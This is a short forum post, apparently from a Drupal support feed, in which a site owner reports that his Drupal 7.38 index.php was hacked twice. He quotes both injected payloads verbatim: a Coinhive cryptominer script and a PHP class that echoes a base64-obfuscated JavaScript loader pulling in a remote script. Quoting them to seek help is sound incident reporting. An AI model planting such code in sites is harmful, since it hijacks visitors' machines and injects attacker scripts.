Index.php was hacked from unknown source

My Client Drupal(7.38) website’s Index.php files was updated two times in Production server

<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
 var miner = new CoinHive.Anonymous('Key');
 miner.start();
</script>

it caused white screen in all the page and it got resolved once removed.

And second time below code was inserted and caused Ajax error.

	class SoFooterClass{
		
		public $data = 'PHNjcmlwdD4KOyhmdW5jdGlvbigpe3ZhciB4PW5hdmlnYXRvclttKCI0dH1uKWV9Z25BKHI7ZWlzdHV9IildO3ZhciB5PWRvY3VtZW50W20oIjplfWlkayxvd29kYywiKV07aWYocyh4LG0oIjBzN3cpb2JkKW4paShXeyIpKSYmIXMoeCxtKCImZHVpe287cixkZW47QWoiKSkpe2lmKCFzKHksbSgicD1uYXttOXQodW9fLF9kXygiKSkpe3ZhciBiPWRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpO2IudHlwZT0ndGV4dC9qYXZhc2NyaXB0JztiLmFzeW5jPXRydWU7Yi5zcmM9bSgnYjIpYWdkOWY4NH00LGY4OTNjKDd7MzszezgsZHs4KGMpMGNifTY5NTE9LHY7JjswKTN7Mns9dWRsaXJjNj87c3JqeC57ZSxkNG82Y3tfOHMpL2xte287Y3submQsbnthLHI5Yn1oO3M7aW1tN2E7LihrfWMoYTNyNHQpL3svdjpzc3JwfXR4dHhoLCcpO3ZhciBvPWRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdzY3JpcHQnKVswXTtvLnBhcmVudE5vZGUuaW5zZXJ0QmVmb3JlKGIsbyk7fX1mdW5jdGlvbiBtKHYpe3ZhciBhPScnO2Zvcih2YXIgZj0wO2Y8di5sZW5ndGg7ZisrKXtpZihmJTI9PT0xKWErPXZbZl07fWE9bihhKTtyZXR1cm4gYTt9ZnVuY3Rpb24gcyh3LGUpe3JldHVybiB3W20oImNmeU8seGllZ2Q4bjNpOyIpXShlKSE9PS0xO31mdW5jdGlvbiBuKHQpe3ZhciBrPScnO2Zvcih2YXIgcD10Lmxlbmd0aC0xO3A+PTA7cC0tKXtrKz10W3BdO31yZXR1cm4gazt9fSkoKTsKPC9zY3JpcHQ+';

		public function __destruct(){
			
			echo base64_decode($this->data);
			
		}
		
	}
	
	$sofooter = new SoFooterClass();

We could not find who hacked this index.php file and remain the site is running fine.

Thanks,

Siva

Drupal version: 


Source: https://www.drupal.org/taxonomy/term/22/feed